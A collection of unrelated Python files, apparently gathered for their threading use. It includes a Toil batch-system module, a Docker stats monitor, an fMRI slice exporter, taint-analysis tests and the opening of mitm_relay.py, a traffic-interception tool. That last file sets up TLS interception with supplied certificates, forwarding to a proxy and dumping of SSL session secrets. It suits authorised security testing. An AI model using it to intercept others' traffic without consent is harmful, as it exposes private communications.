sm.start_monitoring()
t1 = threading.Thread(target=loop, daemon=True)
t1.start()
time.sleep(5)
print("\r\nSTOPPED\r\n")
sm.stop_monitoring()
time.sleep(20)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test dftzd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dock_tool.py
|
import os
import re
import time
import multiprocessing
from threading import Thread
from collections import defaultdict
import json
MEMORY_PATH = '/sys/fs/cgroup/memory/docker'
CPUACCT_PATH = '/sys/fs/cgroup/cpuacct/docker/'
PID_PATH = '/sys/fs/cgroup/devices/docker'
PATH_BW = "/proc/net/route"
IMAGE_PATH = '/var/lib/docker/containers/'
hostname = os.uname()[1]
container_names = []
pids = []
containers = defaultdict(lambda: defaultdict(str))
TOTAL_CPU = multiprocessing.cpu_count()
# get bandwidth of the server
def get_interface_speed():
file_interfaces = open(PATH_BW)
interfaces = re.findall('([a-z]+\d)\W(\d+\S+)', file_interfaces.read())
interface = 'None'
for i in interfaces:
if i[1] == '00000000':
interface = i[0]
try:
bandwidth_file = open(os.path.join('/sys/class/net/', interface, 'speed'))
bandwidth_temp = int(bandwidth_file.read())
except IOError:
bandwidth_temp = 1000
return bandwidth_temp
bandwidth = get_interface_speed()
# get container names
def get_containers():
global container_names
container_names = []
for container_name in os.listdir(MEMORY_PATH):
if os.path.isdir(os.path.join(MEMORY_PATH, container_name)):
container_names.append(container_name)
try:
file_pid = open(os.path.join(PID_PATH, container_name) + '/tasks', 'r')
containers[container_name]['pid'] = file_pid.readline().strip('\n')
file_pid.close()
except IOError:
get_containers()
if not container_names:
print "No containers found"
exit(1)
get_containers()
# get the container statistics
def get_stats():
for container_name in container_names:
image_file = json.loads(open(os.path.join(IMAGE_PATH, container_name, 'config.v2.json')).read())
containers[container_name]['Name'] = image_file['Config']['Labels']['MESOS_TASK_ID'].split('.')[0]
mem_limit_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.limit_in_bytes'))
mem_usage_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.usage_in_bytes'))
mem_limit = float(mem_limit_file.read())
mem_usage = float(mem_usage_file.read())
containers[container_name]['memory'] = format((mem_usage/mem_limit)*100, '.1f')
swp_limit_file = open('/proc/meminfo')
swp_usage_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.memsw.usage_in_bytes'))
swp_limit = int(re.findall('SwapTotal:\s+(\d+)', swp_limit_file.read())[0])*1024
swp_usage = abs(mem_usage-float(swp_usage_file.read()))
containers[container_name]['swap'] = format((swp_usage / swp_limit) * 100, '.1f')
process = Thread(target=cal_cpu_net, args=[container_name])
process.start()
process.join()
# function for running threads
def cal_cpu_net(container_name):
path_cpu_stat = os.path.join(CPUACCT_PATH, container_name, 'cpuacct.stat')
cpu_stat = open(path_cpu_stat)
try:
net_stat = open('/proc/%s/net/dev' % containers[container_name]['pid'], 'r')
except IOError:
get_containers()
net_stat = open('/proc/%s/net/dev' % containers[container_name]['pid'], 'r')
data = net_stat.read()
net_info = (re.findall('\s+(\d+)(?:\s+\d+){7}\s+(\d+).*', data))
old_rx_eth0 = int(net_info[0][0])
old_rx_eth1 = int(net_info[1][0])
old_tx_eth0 = int(net_info[0][1])
old_tx_eth1 = int(net_info[1][1])
total_usage_old = sum([float(k) for k in re.findall('(\d+)', cpu_stat.read())])
cpu_stat.seek(0)
net_stat.seek(0)
time.sleep(1)
cpu_percent = sum([float(k) for k in re.findall('(\d+)', cpu_stat.read())]) - total_usage_old
# average cpu usage per second
data = net_stat.read()
net_info = (re.findall('\s+(\d+)(?:\s+\d+){7}\s+(\d+).*', data))
rx_eth0 = int(net_info[0][0])-old_rx_eth0
rx_eth1 = int(net_info[1][0])-old_rx_eth1
tx_eth0 = int(net_info[0][1])-old_tx_eth0
tx_eth1 = int(net_info[1][1])-old_tx_eth1
rx_percent = format(float((rx_eth0 + rx_eth1))/(bandwidth*10486), '.1f') # (1024*1024/100=10486)
tx_percent = format(float((tx_eth0 + tx_eth1))/(bandwidth*10486), '.1f')
containers[container_name]['cpu_percent'] = format(cpu_percent, '.1f')
containers[container_name]['rx_percent'] = rx_percent
containers[container_name]['tx_percent'] = tx_percent
def display():
get_stats()
os.system('clear')
print('*****************************************************************************')
print(' ID CPU Memory Swap PID Rx Tx Name ')
for name in container_names:
print name[:7], ' ', containers[name]['cpu_percent'], '%', ' ', containers[name]['memory'], '%', ' ',\
containers[name]['swap'], '% ', containers[name]['pid'], ' ', containers[name]['rx_percent'], ' ', \
containers[name]['tx_percent'], ' ', containers[name]['Name']
while True:
display()
|
singleMachine.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from past.utils import old_div
from contextlib import contextmanager
import logging
import os
import time
import math
import subprocess
import sys
import traceback
from threading import Thread, Event
from threading import Lock, Condition
from six.moves.queue import Empty, Queue
import toil
from toil.batchSystems.abstractBatchSystem import BatchSystemSupport, EXIT_STATUS_UNAVAILABLE_VALUE, UpdatedBatchJobInfo
from toil.lib.threading import cpu_count
from toil import worker as toil_worker
from toil.common import Toil
log = logging.getLogger(__name__)
class SingleMachineBatchSystem(BatchSystemSupport):
"""
The interface for running jobs on a single machine, runs all the jobs you
give it as they come in, but in parallel.
Uses a single "daddy" thread to manage a fleet of child processes.
Communication with the daddy thread happens via two queues: one queue of
jobs waiting to be run (the input queue), and one queue of jobs that are
finished/stopped and need to be returned by getUpdatedBatchJob (the output
queue).
When the batch system is shut down, the daddy thread is stopped.
If running in debug-worker mode, jobs are run immediately as they are sent
to the batch system, in the sending thread, and the daddy thread is not
run. But the queues are still used.
"""
@classmethod
def supportsAutoDeployment(cls):
return False
@classmethod
def supportsWorkerCleanup(cls):
return True
numCores = cpu_count()
minCores = 0.1
"""
The minimal fractional CPU. Tasks with a smaller core requirement will be rounded up to this
value.
"""
physicalMemory = toil.physicalMemory()
def __init__(self, config, maxCores, maxMemory, maxDisk):
# Limit to the smaller of the user-imposed limit and what we actually
# have on this machine for each resource.
#
# If we don't have up to the limit of the resource (and the resource
# isn't the inlimited sentinel), warn.
if maxCores > self.numCores:
if maxCores != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough cores! User limited to %i but we only have %i.', maxCores, self.numCores)
maxCores = self.numCores
if maxMemory > self.physicalMemory:
if maxMemory != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough memory! User limited to %i bytes but we only have %i bytes.', maxMemory, self.physicalMemory)
maxMemory = self.physicalMemory
self.physicalDisk = toil.physicalDisk(config)
if maxDisk > self.physicalDisk:
if maxDisk != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough disk space! User limited to %i bytes but we only have %i bytes.', maxDisk, self.physicalDisk)
maxDisk = self.physicalDisk
super(SingleMachineBatchSystem, self).__init__(config, maxCores, maxMemory, maxDisk)
assert self.maxCores >= self.minCores
assert self.maxMemory >= 1
# The scale allows the user to apply a factor to each task's cores requirement, thereby
# squeezing more tasks onto each core (scale < 1) or stretching tasks over more cores
# (scale > 1).
self.scale = config.scale
if config.badWorker > 0 and config.debugWorker:
# We can't throw SIGUSR1 at the worker because it is also going to
# be the leader and/or test harness.
raise RuntimeError("Cannot use badWorker and debugWorker together; "
"worker would have to kill the leader")
self.debugWorker = config.debugWorker
# A counter to generate job IDs and a lock to guard it
self.jobIndex = 0
self.jobIndexLock = Lock()
# A dictionary mapping IDs of submitted jobs to the command line
self.jobs = {}
"""
:type: dict[str,toil.job.JobDescription]
"""
# A queue of jobs waiting to be executed. Consumed by the daddy thread.
self.inputQueue = Queue()
# A queue of finished jobs. Produced by the daddy thread.
self.outputQueue = Queue()
# A dictionary mapping IDs of currently running jobs to their Info objects
self.runningJobs = {}
"""
:type: dict[str,Info]
"""
# These next two are only used outside debug-worker mode
# A dict mapping PIDs to Popen objects for running jobs.
# Jobs that don't fork are executed one at a time in the main thread.
self.children = {}
"""
:type: dict[int,subprocess.Popen]
"""
# A dict mapping child PIDs to the Job IDs they are supposed to be running.
self.childToJob = {}
"""
:type: dict[int,str]
"""
# A pool representing available CPU in units of minCores
self.coreFractions = ResourcePool(int(old_div(self.maxCores, self.minCores)), 'cores')
# A pool representing available memory in bytes
self.memory = ResourcePool(self.maxMemory, 'memory')
# A pool representing the available space in bytes
self.disk = ResourcePool(self.maxDisk, 'disk')
# If we can't schedule something, we fill this in with a reason why
self.schedulingStatusMessage = None
# We use this event to signal shutdown
self.shuttingDown = Event()
# A thread in charge of managing all our child processes.
# Also takes care of resource accounting.
self.daddyThread = None
# If it breaks it will fill this in
self.daddyException = None
if self.debugWorker:
log.debug('Started in worker debug mode.')
else:
self.daddyThread = Thread(target=self.daddy, daemon=True)
self.daddyThread.start()
log.debug('Started in normal mode.')
def daddy(self):
"""
Be the "daddy" thread.
Our job is to look at jobs from the input queue.
If a job fits in the available resources, we allocate resources for it
and kick off a child process.
We also check on our children.
When a child finishes, we reap it, release its resources, and put its
information in the output queue.
"""
try:
log.debug('Started daddy thread.')
while not self.shuttingDown.is_set():
# Main loop
while not self.shuttingDown.is_set():
# Try to start as many jobs as we can try to start
try:
# Grab something from the input queue if available.
args = self.inputQueue.get_nowait()
jobCommand, jobID, jobCores, jobMemory, jobDisk, environment = args
coreFractions = int(old_div(jobCores, self.minCores))
# Try to start the child
result = self._startChild(jobCommand, jobID,
coreFractions, jobMemory, jobDisk, environment)
if result is None:
# We did not get the resources to run this job.
# Requeue last, so we can look at the next job.
# TODO: Have some kind of condition the job can wait on,
# but without threads (queues for jobs needing
# cores/memory/disk individually)?
self.inputQueue.put(args)
break
# Otherwise it's a PID if it succeeded, or False if it couldn't
# start. But we don't care either way here.
except Empty:
# Nothing to run. Stop looking in the queue.
break
# Now check on our children.
for done_pid in self._pollForDoneChildrenIn(self.children):
# A child has actually finished.
# Clean up after it.
self._handleChild(done_pid)
# Then loop again: start and collect more jobs.
# TODO: It would be good to be able to wait on a new job or a finished child, whichever comes first.
# For now we just sleep and loop.
time.sleep(0.01)
# When we get here, we are shutting down.
for popen in self.children.values():
# Kill all the children, going through popen to avoid signaling re-used PIDs.
popen.kill()
for popen in self.children.values():
# Reap all the children
popen.wait()
# Then exit the thread.
return
except Exception as e:
log.critical('Unhandled exception in daddy thread: %s', traceback.format_exc())
# Pass the exception back to the main thread so it can stop the next person who calls into us.
self.daddyException = e
raise
def _checkOnDaddy(self):
if self.daddyException is not None:
# The daddy thread broke and we cannot do our job
log.critical('Propagating unhandled exception in daddy thread to main thread')
exc = self.daddyException
self.daddyException = None
raise exc
def _pollForDoneChildrenIn(self, pid_to_popen):
"""
See if any children represented in the given dict from PID to Popen
object have finished.
Return a collection of their PIDs.
Guarantees that each child's exit code will be gettable via wait() on
the child's Popen object (i.e. does not reap the child, unless via
Popen).
"""
# We keep our found PIDs in a set so we can work around waitid showing
# us the same one repeatedly.
ready = set()
# Find the waitid function
waitid = getattr(os, 'waitid', None)
if callable(waitid):
# waitid exists (not Mac)
while True:
# Poll for any child to have exit, but don't reap it. Leave reaping
# to the Popen.
# TODO: What if someone else in Toil wants to do this syscall?
# TODO: Is this one-notification-per-done-child with WNOHANG? Or
# can we miss some? Or do we see the same one repeatedly until it
# is reaped?
try:
siginfo = waitid(os.P_ALL, -1, os.WEXITED | os.WNOWAIT | os.WNOHANG)
except ChildProcessError:
# This happens when there is nothing to wait on right now,
# instead of the weird C behavior of overwriting a field in
# a pointed-to struct.
siginfo = None
if siginfo is not None and siginfo.si_pid in pid_to_popen and siginfo.si_pid not in ready:
# Something new finished
ready.add(siginfo.si_pid)
else:
# Nothing we own that we haven't seen before has finished.
return ready
else:
# On Mac there's no waitid and no way to wait and not reap.
# Fall back on polling all the Popen objects.
# To make this vaguely efficient we have to return done children in
# batches.
for pid, popen in pid_to_popen.items():
if popen.poll() is not None:
# Process is done
ready.add(pid)
log.debug('Child %d has stopped', pid)
# Return all the done processes we found
return ready
def _runDebugJob(self, jobCommand, jobID, environment):
"""
Run the jobCommand right now, in the current thread.
May only be called in debug-worker mode.
Assumes resources are available.
"""
assert self.debugWorker
# TODO: It is not possible to kill running jobs in forkless mode,
# because they are run immediately in the main thread.
info = Info(time.time(), None, None, killIntended=False)
self.runningJobs[jobID] = info
if jobCommand.startswith("_toil_worker "):
# We can actually run in this thread
jobName, jobStoreLocator, jobStoreID = jobCommand.split()[1:] # Parse command
jobStore = Toil.resumeJobStore(jobStoreLocator)
toil_worker.workerScript(jobStore, jobStore.config, jobName, jobStoreID,
redirectOutputToLogFile=not self.debugWorker) # Call the worker
else:
# Run synchronously. If starting or running the command fails, let the exception stop us.
subprocess.check_call(jobCommand,
shell=True,
env=dict(os.environ, **environment))
self.runningJobs.pop(jobID)
if not info.killIntended:
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=0, wallTime=time.time() - info.time, exitReason=None))
def getSchedulingStatusMessage(self):
# Implement the abstractBatchSystem's scheduling status message API
return self.schedulingStatusMessage
def _setSchedulingStatusMessage(self, message):
"""
If we can't run a job, we record a short message about why not. If the
leader wants to know what is up with us (for example, to diagnose a
deadlock), it can ask us for the message.
"""
self.schedulingStatusMessage = message
def _startChild(self, jobCommand, jobID, coreFractions, jobMemory, jobDisk, environment):
"""
Start a child process for the given job.
Allocate its required resources and save it and save it in our bookkeeping structures.
If the job is started, returns its PID.
If the job fails to start, reports it as failed and returns False.
If the job cannot get the resources it needs to start, returns None.
"""
# We fill this in if we manage to actually start the child.
popen = None
# This is when we started working on the job.
startTime = time.time()
# See if we can fit the job in our resource pools right now.
if self.coreFractions.acquireNow(coreFractions):
# We got some cores
if self.memory.acquireNow(jobMemory):
# We got some memory
if self.disk.acquireNow(jobDisk):
# We got the final resource, disk.
# Actually run the job.
# When it finishes we will release what it was using.
# So it is important to not lose track of the child process.
try:
# Launch the job
popen = subprocess.Popen(jobCommand,
shell=True,
env=dict(os.environ, **environment))
except Exception:
# If the job can't start, make sure we release resources now
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
log.error('Could not start job %s: %s', jobID, traceback.format_exc())
# Report as failed.
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=EXIT_STATUS_UNAVAILABLE_VALUE, wallTime=0, exitReason=None))
# Free resources
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
# Complain it broke.
return False
else:
# If the job did start, record it
self.children[popen.pid] = popen
# Make sure we can look it up by PID later
self.childToJob[popen.pid] = jobID
# Record that the job is running, and the resources it is using
info = Info(startTime, popen, (coreFractions, jobMemory, jobDisk), killIntended=False)
self.runningJobs[jobID] = info
log.debug('Launched job %s as child %d', jobID, popen.pid)
# Report success starting the job
# Note that if a PID were somehow 0 it would look like False
assert popen.pid != 0
return popen.pid
else:
# We can't get disk, so free cores and memory
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self._setSchedulingStatusMessage('Not enough disk to run job %s' % jobID)
else:
# Free cores, since we can't get memory
self.coreFractions.release(coreFractions)
self._setSchedulingStatusMessage('Not enough memory to run job %s' % jobID)
else:
self._setSchedulingStatusMessage('Not enough cores to run job %s' % jobID)
# If we get here, we didn't succeed or fail starting the job.
# We didn't manage to get the resources.
# Report that.
return None
def _handleChild(self, pid):
"""
Handle a child process PID that has finished.
The PID must be for a child job we started.
Not thread safe to run at the same time as we are making more children.
Remove the child from our bookkeeping structures and free its resources.
"""
# Look up the child
popen = self.children[pid]
jobID = self.childToJob[pid]
info = self.runningJobs[jobID]
# Unpack the job resources
(coreFractions, jobMemory, jobDisk) = info.resources
# Clean up our records of the job.
self.runningJobs.pop(jobID)
self.childToJob.pop(pid)
self.children.pop(pid)
# See how the child did, and reap it.
statusCode = popen.wait()
if statusCode != 0 and not info.killIntended:
log.error("Got exit code %i (indicating failure) "
"from job %s.", statusCode, self.jobs[jobID])
if not info.killIntended:
# Report if the job failed and we didn't kill it.
# If we killed it then it shouldn't show up in the queue.
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=statusCode, wallTime=time.time() - info.time, exitReason=None))
# Free up the job's resources.
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
log.debug('Child %d for job %s succeeded', pid, jobID)
def issueBatchJob(self, jobDesc):
"""Adds the command and resources to a queue to be run."""
self._checkOnDaddy()
# Round cores to minCores and apply scale.
# Make sure to give minCores even if asked for 0 cores, or negative or something.
cores = max(math.ceil(jobDesc.cores * self.scale / self.minCores) * self.minCores, self.minCores)
# Don't do our own assertions about job size vs. our configured size.
# The abstract batch system can handle it.
self.checkResourceRequest(jobDesc.memory, cores, jobDesc.disk, name=jobDesc.jobName,
detail='Scale is set to {}.'.format(self.scale))
self.checkResourceRequest(jobDesc.memory, cores, jobDesc.disk)
log.debug("Issuing the command: %s with memory: %i, cores: %i, disk: %i" % (
jobDesc.command, jobDesc.memory, cores, jobDesc.disk))
with self.jobIndexLock:
jobID = self.jobIndex
self.jobIndex += 1
self.jobs[jobID] = jobDesc.command
if self.debugWorker:
# Run immediately, blocking for return.
# Ignore resource requirements; we run one job at a time
self._runDebugJob(jobDesc.command, jobID, self.environment.copy())
else:
# Queue the job for later
self.inputQueue.put((jobDesc.command, jobID, cores, jobDesc.memory,
jobDesc.disk, self.environment.copy()))
return jobID
def killBatchJobs(self, jobIDs):
"""Kills jobs by ID."""
self._checkOnDaddy()
log.debug('Killing jobs: {}'.format(jobIDs))
for jobID in jobIDs:
if jobID in self.runningJobs:
info = self.runningJobs[jobID]
info.killIntended = True
if info.popen != None:
log.debug('Send kill to PID %s', info.popen.pid)
info.popen.kill()
log.debug('Sent kill to PID %s', info.popen.pid)
else:
# No popen if running in forkless mode currently
assert self.debugWorker
log.critical("Can't kill job: %s in debug mode" % jobID)
while jobID in self.runningJobs:
pass
def getIssuedBatchJobIDs(self):
"""Just returns all the jobs that have been run, but not yet returned as updated."""
self._checkOnDaddy()
return list(self.jobs.keys())
def getRunningBatchJobIDs(self):
self._checkOnDaddy()
now = time.time()
return {jobID: now - info.time for jobID, info in list(self.runningJobs.items())}
def shutdown(self):
"""
Cleanly terminate and join daddy thread.
"""
if self.daddyThread is not None:
# Tell the daddy thread to stop.
self.shuttingDown.set()
# Wait for it to stop.
self.daddyThread.join()
BatchSystemSupport.workerCleanup(self.workerCleanupInfo)
def getUpdatedBatchJob(self, maxWait):
"""Returns a tuple of a no-longer-running job, the return value of its process, and its runtime, or None."""
self._checkOnDaddy()
try:
item = self.outputQueue.get(timeout=maxWait)
except Empty:
return None
self.jobs.pop(item.jobID)
log.debug("Ran jobID: %s with exit value: %i", item.jobID, item.exitStatus)
return item
@classmethod
def setOptions(cls, setOption):
setOption("scale", default=1)
class Info(object):
"""
Record for a running job.
Stores the start time of the job, the Popen object representing its child
(or None), the tuple of (coreFractions, memory, disk) it is using (or
None), and whether the job is supposed to be being killed.
"""
# Can't use namedtuple here since killIntended needs to be mutable
def __init__(self, startTime, popen, resources, killIntended):
self.time = startTime
self.popen = popen
self.resources = resources
self.killIntended = killIntended
class ResourcePool(object):
"""
Represents an integral amount of a resource (such as memory bytes).
Amounts can be acquired immediately or with a timeout, and released.
Provides a context manager to do something with an amount of resource
acquired.
"""
def __init__(self, initial_value, resourceType, timeout=5):
super(ResourcePool, self).__init__()
# We use this condition to signal everyone whenever some resource is released.
# We use its associated lock to guard value.
self.condition = Condition()
# This records how much resource is available right now.
self.value = initial_value
self.resourceType = resourceType
self.timeout = timeout
def acquireNow(self, amount):
"""
Reserve the given amount of the given resource.
Returns True if successful and False if this is not possible immediately.
"""
with self.condition:
if amount > self.value:
return False
self.value -= amount
self.__validate()
return True
def acquire(self, amount):
"""
Reserve the given amount of the given resource.
Raises AcquisitionTimeoutException if this is not possible in under
self.timeout time.
"""
with self.condition:
startTime = time.time()
while amount > self.value:
if time.time() - startTime >= self.timeout:
# This means the thread timed out waiting for the resource.
raise self.AcquisitionTimeoutException(resource=self.resourceType,
requested=amount, available=self.value)
# Allow self.timeout seconds to get the resource, else quit
# through the above if condition. This wait + timeout is the
# last thing in the loop such that a request that takes longer
# than self.timeout due to multiple wakes under the threshold
# are still honored.
self.condition.wait(timeout=self.timeout)
self.value -= amount
self.__validate()
def release(self, amount):
with self.condition:
self.value += amount
self.__validate()
self.condition.notify_all()
def __validate(self):
assert 0 <= self.value
def __str__(self):
return str(self.value)
def __repr__(self):
return "ResourcePool(%i)" % self.value
@contextmanager
def acquisitionOf(self, amount):
self.acquire(amount)
try:
yield
finally:
self.release(amount)
class AcquisitionTimeoutException(Exception):
"""To be raised when a resource request times out."""
def __init__(self, resource, requested, available):
"""
Creates an instance of this exception that indicates which resource is insufficient for
current demands, as well as the amount requested and amount actually available.
:param str resource: string representing the resource type
:param int|float requested: the amount of the particular resource requested that resulted
in this exception
:param int|float available: amount of the particular resource actually available
"""
self.requested = requested
self.available = available
self.resource = resource
|
read_nii_files_parallel_processing.py
|
# This code loads the nii files (in parallel) and saves them in to types: 1- all 3 views in one figure; 2) all individual slices in specified folders.
# Written by Azam Hamidinekoo, Aberystwyth University, 2019
#-------------------------------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import nibabel as nib
import os
from multiprocessing import Process, Queue
import scipy
def show_slices(slices):
""" Function to display row of image slices """
fig, axes = plt.subplots(1, len(slices))
for i, slice in enumerate(slices):
axes[i].imshow(slice.T, cmap="gray", origin="lower")
axes[i].axis('off')
def saveAllViews(q, name, path):
example_filename = os.path.join(path, name)
img = nib.load(example_filename)
img_data = img.get_fdata()
print(' The shape of the 3D image is:')
print(img_data.shape)
#print(img.affine.shape)
#print(img.header)
# Save all views in one figure
a = np.array(img_data.shape)
for i in range(0, a.min()):
slice_00 = img_data[i, :, :]
slice_11 = img_data[:, i, :]
slice_22 = img_data[:, :, i]
slices_together = [slice_00, slice_11, slice_22]
show_slices(slices_together)
plt.suptitle(name)
# Save the figures with all views
folderName = '3Views_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderName):
os.mkdir(path+'/'+folderName)
plt.savefig(path+'/'+folderName+'/'+str(i)+'.png')
plt.close('all')
def main():
root = "/media/azh2/Seagate Backup Plus Drive/Azam/fMARI_data/Bangor/"
for path, subdirs, files in os.walk(root):
for name in files:
print os.path.join(path, name)
if name.find('nii.gz') != -1 and name.find('rest.nii.gz') == -1:
# save via parallel processing
q = Queue()
all_views = Process(target=saveAllViews, args=(q, name, path))
all_views.start()
# Save the slices from different views
for i0 in range(0, img_data.shape[0]):
slice_0 = img_data[i0, :, :]
# save the slice0
folderSlices_0 = 'view0_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_0):
os.mkdir(path+'/'+folderSlices_0)
plt.imsave(path+'/'+folderSlices_0+'/'+str(i0)+'.png', slice_0, cmap='gray',
vmin=slice_0.min(), vmax=slice_0.max())
for i1 in range(0, img_data.shape[1]):
slice_1 = img_data[:, i1, :]
# save the slice1
folderSlices_1 = 'view1_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_1):
os.mkdir(path+'/'+folderSlices_1)
plt.imsave(path+'/'+folderSlices_1+'/'+str(i1)+'.png', slice_1, cmap='gray',
vmin=slice_1.min(), vmax=slice_1.max())
for i2 in range(0, img_data.shape[2]):
slice_2 = img_data[:, :, i2]
# save the slice2
folderSlices_2 = 'view2_' + name.replace('.nii.gz','')
if not os.path.exists(path+'/'+folderSlices_2):
os.mkdir(path+'/'+folderSlices_2)
plt.imsave(path+'/'+folderSlices_2+'/'+str(i2)+'.png', slice_2, cmap='gray',
vmin=slice_2.min(), vmax=slice_2.max())
plt.show()
#plt.pause(.1)
if __name__ == '__main__':
main()
|
partial.py
|
# flake8: noqa
import multiprocessing
from builtins import __test_sink, __test_source
from functools import partial
def a_flows_to_sink(a, b):
__test_sink(a)
def partial_application_with_tainted():
x = __test_source()
partial(a_flows_to_sink, x)
def partial_application_with_benign():
x = 1
partial(a_flows_to_sink, x)
def partial_application_with_named_a():
x = __test_source()
partial(a_flows_to_sink, a=x)
def partial_application_with_named_b():
x = __test_source()
partial(a_flows_to_sink, b=x)
def multiprocessing_tainted():
multiprocessing.Process(target=a_flows_to_sink, args=(__test_source(), 1))
def multiprocessing_not_tainted():
multiprocessing.Process(target=a_flows_to_sink, args=(1, __test_source()))
|
decorators.py
|
# -*- coding: utf-8 -*-
# @Date : 2016-01-23 21:40
# @Author : leiyue (mr.leiyue@gmail.com)
# @Link : https://leiyue.wordpress.com/
def async(func):
from threading import Thread
from functools import wraps
@wraps(func)
def wrapper(*args, **kwargs):
thr = Thread(target=func, args=args, kwargs=kwargs)
thr.start()
return thr
return wrapper
|
mitm_relay.py
|
#!/usr/bin/env python3
import sys
import socket
import ssl
import os
import requests
import argparse
import time
import string
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from select import select
BIND_WEBSERVER = ('127.0.0.1', 49999)
BUFSIZE = 4096
__prog_name__ = 'mitm_relay'
__version__ = 1.0
def main():
parser = argparse.ArgumentParser(description='%s version %.2f' % (__prog_name__, __version__))
parser.add_argument('-l', '--listen',
action='store',
metavar='<listen>',
dest='listen',
help='Address the relays will listen on. Default: 0.0.0.0',
default='0.0.0.0')
parser.add_argument('-r', '--relay',
action='append',
nargs='+',
metavar='<relay>',
dest='relays',
help='''Create new relays.
Several relays can be created by repeating the paramter.
If the protocol is omitted, TCP will be assumed.
Format: [udp:|tcp:]lport:rhost:rport''',
required=True)
parser.add_argument('-s', '--script',
action='store',
metavar='<script>',
dest='script',
type=argparse.FileType('r'),
help='''Python script implementing the handle_request() and
handle_response() functions (see example). They will be
called before forwarding traffic to the proxy, if specified.''',
default=False)
parser.add_argument('-p', '--proxy',
action='store',
metavar='<proxy>',
dest='proxy',
help='''Proxy to forward all requests/responses to.
If omitted, traffic will only be printed to the console
(monitoring mode unless a script is specified).
Format: host:port''',
default=False)
parser.add_argument('-c', '--cert',
action='store',
metavar='<cert>',
dest='cert',
type=argparse.FileType('r'),
help='Certificate file to use for SSL/TLS interception',
default=False)
parser.add_argument('-k', '--key',
action='store',
metavar='<key>',
dest='key',
type=argparse.FileType('r'),
help='Private key file to use for SSL/TLS interception',
default=False)
parser.add_argument('-cc', '--clientcert',
action='store',
metavar='<clientcert>',
dest='clientcert',
type=argparse.FileType('r'),
help='Client certificate file to use for connecting to server',
default=False)
parser.add_argument('-ck', '--clientkey',
action='store',
metavar='<clientkey>',
dest='clientkey',
type=argparse.FileType('r'),
help='Client private key file to use for connecting to server',
default=False)
parser.add_argument('-t', '--tlsver',
action='store',
metavar='<tls1|tls11|tls12|ssl2|ssl3>',
dest='tlsver',
help='Force SSL/TLS version',
default=False)
parser.add_argument('-sk', '--sslkeylog',
action='store',
metavar='<ssl keylog file>',
dest='sslkeylog',
type=argparse.FileType('a'),
help='Dump SSL (pre-)master secrets to <ssl keylog file>',
default=False)
parser.add_argument('-ct', '--client-timeout',
action='store',
metavar=1.0,
dest='client_timeout',
type=int,
help='Client socket connection timeout',
default=False)
parser.add_argument('-st', '--server-timeout',
action='store',
metavar=1.0,
dest='server_timeout',
type=int,
help='Server socket connection timeout',
default=False)
cfg = parser.parse_args()
cfg.prog_name = __prog_name__
relays = [item for sublist in cfg.relays for item in sublist]
cfg.relays = []
for r in relays:
r = r.split(':')
try:
if len(r) == 3:
cfg.relays.append(('tcp', int(r[0]), r[1], int(r[2])))
elif len(r) == 4 and r[0] in ['tcp', 'udp']:
cfg.relays.append((r[0], int(r[1]), r[2], int(r[3])))
else:
raise
if r[0] == 'udp' and cfg.listen.startswith('127.0.0'):
print(color("[!] In UDP, it's not recommended to bind to 127.0.0.1. If you see errors, try to bind to your LAN IP address instead.", 1, 31))
except:
sys.exit('[!] error: Invalid relay specification, see help.')
if not (cfg.cert and cfg.key):
print(color("[!] Server cert/key not provided, SSL/TLS interception will not be available. To generate certs, see provided script 'gen_certs.sh'.", 1, 31))
if not (cfg.clientcert and cfg.clientkey):
print("[i] Client cert/key not provided.")
# There is no point starting the local web server
# if we are not going to intercept the req/resp (monitor only).
if cfg.proxy:
start_ws()
else:
print(color("[!] Interception disabled! %s will run in monitoring mode only." % __prog_name__, 0, 31))
# If a script was specified, import it
if cfg.script:
try:
from imp import load_source
cfg.script_module = load_source(cfg.script.name, cfg.script.name)
except Exception as e:
print(color("[!] %s" % str(e), 1, 31))
sys.exit()
# If a ssl keylog file was specified, dump (pre-)master secrets
if cfg.sslkeylog:
try:
import sslkeylog
sslkeylog.set_keylog(cfg.sslkeylog)
except Exception as e:
print(color("[!] %s" % str(e), 1, 31))
sys.exit()
server_threads = []
for relay in cfg.relays:
server_threads.append(Thread(target=create_server, args=(relay, cfg)))
for t in server_threads:
